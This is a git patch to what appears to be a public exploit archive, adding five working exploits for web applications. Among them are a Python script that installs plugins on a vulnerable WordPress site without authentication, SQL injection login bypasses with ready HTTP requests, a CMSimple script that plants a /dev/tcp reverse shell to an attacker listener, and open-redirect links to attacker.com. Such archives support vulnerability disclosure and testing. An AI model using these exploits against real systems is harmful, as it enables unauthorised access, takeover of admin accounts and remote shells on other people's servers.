From f32872547acbdc2e5ab5736463e629703bb62aa9 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 1 Oct 2021 05:02:17 +0000 Subject: [PATCH] DB: 2021-10-01 5 changes to exploits/shellcodes Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated) Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi) PlaceOS 1.2109.1 - Open Redirection --- exploits/multiple/webapps/50359.txt | 18 +++++ exploits/php/webapps/50354.py | 71 ++++++++++++++++++++ exploits/php/webapps/50355.txt | 32 +++++++++ exploits/php/webapps/50356.py | 60 +++++++++++++++++ exploits/php/webapps/50357.txt | 100 ++++++++++++++++++++++++++++ files_exploits.csv | 5 ++ 6 files changed, 286 insertions(+) create mode 100644 exploits/multiple/webapps/50359.txt create mode 100755 exploits/php/webapps/50354.py create mode 100644 exploits/php/webapps/50355.txt create mode 100755 exploits/php/webapps/50356.py create mode 100644 exploits/php/webapps/50357.txt diff --git a/exploits/multiple/webapps/50359.txt b/exploits/multiple/webapps/50359.txt new file mode 100644 index 000000000..a4e30e73a --- /dev/null +++ b/exploits/multiple/webapps/50359.txt @@ -0,0 +1,18 @@ +# Exploit Title: PlaceOS 1.2109.1 - Open Redirection +# Date: 29-09-2021 +# Exploit Author: Hamza Khedr @ Accenture Austalia AARO Team +# Vendor Homepage: https://place.technology/ +# Software Link: https://github.com/PlaceOS +# Version: < 1.29.10 +# Tested on: Ubuntu 20.04 +# CVE: CVE-2021-41826 +# +# +# PoC: "https://office.example.com/auth/logout?continue=//attacker.com" +# "https://office.example.com/auth/logout?continue=.attacker.com" +# "https://office.example.com/auth/logout?continue=:password@attacker.com" +# +# +# Reference: https://github.com/PlaceOS/auth/issues/36 +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41826 +# https://nvd.nist.gov/vuln/detail/CVE-2021-41826 \ No newline at end of file diff --git a/exploits/php/webapps/50354.py b/exploits/php/webapps/50354.py new file mode 100755 index 000000000..6a912d29d --- /dev/null +++ b/exploits/php/webapps/50354.py @@ -0,0 +1,71 @@ +# Exploit Title: Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation +# Google Dork: inurl:/wp-content/plugins/js-jobs/ +# Date: 22/09/2021 +# Exploit Author: spacehen +# Vendor Homepage: https://wordpress.org/plugins/js-jobs/ +# Version: <= 1.9.1.4 +# Tested on: Ubuntu 20.04.1 + +import os.path +from os import path +import json +import requests; +import sys + +def print_banner(): + print("JS Job Manager <= 1.1.7 - Arbitrary Plugin Install/Activation") + print("Author -> space_hen (www.github.com/spacehen)") + + +def print_usage(): + print("Usage: python3 exploit.py [target url] [plugin slug]") + print("Ex: python3 exploit.py https://example.com advanced-uploader") + print("Note: To activate plugin successfully, main plugin file") + print("should match slug, i.e ./plugin-slug/plugin-slug.php") + +def vuln_check(uri): + response = requests.get(uri) + raw = response.text + + if ("Not Allowed!" in raw): + return True; + else: + return False; + +def main(): + + print_banner() + if(len(sys.argv) != 3): + print_usage(); + sys.exit(1); + + base = sys.argv[1] + slug = sys.argv[2] + + ajax_action = 'jsjobs_ajax' + admin = '/wp-admin/admin-ajax.php'; + + uri = base + admin + '?action=' + ajax_action ; + check = vuln_check(uri); + + if(check == False): + print("(*) Target not vulnerable!"); + sys.exit(1) + + data = { + "task" : "installPluginFromAjax", + "jsjobsme" : "jsjobs", + "pluginslug" : slug + } + print("Installing plugin..."); + response = requests.post(uri, data=data ) + print("Activating plugin..."); + + data = { + "task" : "activatePluginFromAjax", + "jsjobsme" : "jsjobs", + "pluginslug" : slug + } + response = requests.post(uri, data=data ) + +main(); \ No newline at end of file diff --git a/exploits/php/webapps/50355.txt b/exploits/php/webapps/50355.txt new file mode 100644 index 000000000..40a007997 --- /dev/null +++ b/exploits/php/webapps/50355.txt @@ -0,0 +1,32 @@ +# Exploit Title: Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass +# Date: 29-09-2021 +# Exploit Author: sudoninja +# Vendor Homepage: https://phpgurukul.com +# Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/ +# Version: 1.0 +# Tested on: XAMPP / Windows 10 + +Steps-To-Reproduce: +Step 1 Go to the Product admin panel http://localhost/ccms/index.php. +Step 2 – Enter anything in username and password +Step 3 – Click on Login and capture the request in the burp suite +Step4 – Change the username to ' OR 1 -- - and password to ccms +Step 5 – Click forward and now you will be logged in as admin. + +POC + +POST /ccms/ HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 49 +Origin: http://localhost +Connection: close +Referer: http://localhost/ccms/ +Cookie: PHPSESSID=agarg3okitkr3g8dbi5icnq8du +Upgrade-Insecure-Requests: 1 + +username='%20OR%201%20--%20-&password=ccms&login= \ No newline at end of file diff --git a/exploits/php/webapps/50356.py b/exploits/php/webapps/50356.py new file mode 100755 index 000000000..1b9fd0fac --- /dev/null +++ b/exploits/php/webapps/50356.py @@ -0,0 +1,60 @@ +# Exploit Title: Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated) +# Date: 29.09.2021 +# Exploit Author: pussycat0x +# Vendor Homepage: https://www.cmsimple.org/ +# Version: 5.4 +# Tested on: ubuntu-20.04.1 + +import argparse +from bs4 import BeautifulSoup +from argparse import ArgumentParser +import requests +parser= ArgumentParser(description="cmsimple ", epilog='cmsimpleRCE.py -url targetdomai.com -u username -p password -ip lhost -lp lport') +rparser = parser.add_argument_group('required argument') +rparser.add_argument('-url','--host', type=str, help='target domain',required=True) +rparser.add_argument('-u' ,'--username', type=str, help='', required=True) +rparser.add_argument('-p','--password',type=str,help='', required=True) +rparser.add_argument('-ip','--lhost',type=str,help='listener ip', required=True) +rparser.add_argument('-lp','--lport', type=str,help='listener port', required=True) +args= parser.parse_args() +#url ='192.168.1.106' +s = requests.Session() + +def main(): + try: + + url =(args.host) + payload = { + 'user':args.username, + 'passwd':args.password, + 'submit': 'Login', + 'login':'true', + } + login=s.post(url +'/?Welcome_to_CMSimple_5',data=payload) + if login.status_code == 200: + print('Exploit Completed') + else: + print("Invalid Credential") + cook =(login.cookies.get_dict()) + temp = s.get(url +'/?file=template&action=edit', cookies=cook) + soup = BeautifulSoup(temp.text, 'lxml') + csrfToken = soup.find('input',attrs = {'name':'csrf_token'})['value'] + #& /dev/tcp/10.0.0.10/1234 0>&1'"); + rev = """& /dev/tcp/""" + rev2=(args.lhost) + rev3=(args.lport) + rev4=""" 0>&1'");""" + php =(rev+rev2+'/'+rev3+rev4) + revpayload = { + 'cmsimpleDataFileStored':'cmsimpleDataFileStored', + 'csrf_token':csrfToken, + 'text':php, + 'file':'template', + 'action':'save', + } + shell = s.post(url +'/',cookies=cook , data=revpayload) + exec = s.get(url+'/') + exit() + except: + pass +main() \ No newline at end of file diff --git a/exploits/php/webapps/50357.txt b/exploits/php/webapps/50357.txt new file mode 100644 index 000000000..db2ec5be2 --- /dev/null +++ b/exploits/php/webapps/50357.txt @@ -0,0 +1,100 @@ +# Exploit Title: Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi) +# Date: 28.09.2021 +# Exploit Author: Murat +# Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip +# Version: 1.0 +# Tested on: Windows 10 + +# Pharmacy Point of Sale System v1.0 SQLi + + +GET /pharmacy/view_product.php?id=-1 HTTP/1.1 +Host: localhost +Cookie: PHPSESSID=5smfl8sfgemi1h9kdl2h3dsnd6 +Sec-Ch-Ua: "Chromium";v="93", " Not;A Brand";v="99" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate +Connection: close + + +POC: +https://localhost/pharmacy/view_product.php?id=2000110022%27+union+select+1%2c1%2c1%2c1%2c%28select%27SqLi%27%7c%7csubstr%28%28select+sqlite%5fversion%28%29%7c%7c%27%04%27%7c%7c%27sqlite%5fmaster%27%7c%7c%27%04%27%7c%7c%27anonymous%27%7c%7c%27%01%03%03%07%27%29%2c1%2c65536%29%29%2c1%2c1%2c1-- + +----------------------------------------------------------------------- + +#Other parameters with sql injection vulnerability; + + +==> /pharmacy/?date_from=&date_to=1'"&page=sales_report + +==> /pharmacy/?date_from=1'"&date_to=&page=sales_report + +==> /pharmacy/manage_stock.php?expiry_date=01/01/1967&id=-1'&product_id=1&quantity=1&supplier_id=1 + +==> GET /pharmacy/view_receipt.php?id=1'"&view_only=true + +==> /pharmacy/manage_product.php?id=-1' + +==> POST /pharmacy/Actions.php?a=save_stock + +------------YWJkMTQzNDcw +Content-Disposition: form-data; name="id" + + +------------YWJkMTQzNDcw +Content-Disposition: form-data; name="supplier_id" + +1'" +------------YWJkMTQzNDcw +Content-Disposition: form-data; name="product_id" + +2'" +------------YWJkMTQzNDcw +Content-Disposition: form-data; name="quantity" + +1'" +------------YWJkMTQzNDcw +Content-Disposition: form-data; name="expiry_date" + + +==> POST /pharmacy/Actions.php?a=save_product HTTP/1.1 + +------------YWJkMTQzNDcw +Content-Disposition: form-data; name="id" + +5'" +------------YWJkMTQzNDcw +Content-Disposition: form-data; name="product_code" + +94102'" +------------YWJkMTQzNDcw +Content-Disposition: form-data; name="category_id" + +1'" +------------YWJkMTQzNDcw +Content-Disposition: form-data; name="name" + +pHqghUme'" +------------YWJkMTQzNDcw +Content-Disposition: form-data; name="price" + +1'" +------------YWJkMTQzNDcw +Content-Disposition: form-data; name="description" + +1'" +------------YWJkMTQzNDcw +Content-Disposition: form-data; name="status" + +0'" +------------YWJkMTQzNDcw-- +- \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 614d9afd9..8195d2224 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44469,3 +44469,8 @@ id,file,description,date,author,type,platform,port 50350,exploits/php/webapps/50350.txt,"WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php, 50352,exploits/php/webapps/50352.txt,"OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Eric Salario",webapps,php, 50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Mr.Gedik,webapps,php, +50354,exploits/php/webapps/50354.py,"Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation",1970-01-01,spacehen,webapps,php, +50355,exploits/php/webapps/50355.txt,"Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php, +50356,exploits/php/webapps/50356.py,"Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,pussycat0x,webapps,php, +50357,exploits/php/webapps/50357.txt,"Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)",1970-01-01,Murat,webapps,php, +50359,exploits/multiple/webapps/50359.txt,"PlaceOS 1.2109.1 - Open Redirection",1970-01-01,"Hamza Khedr",webapps,multiple,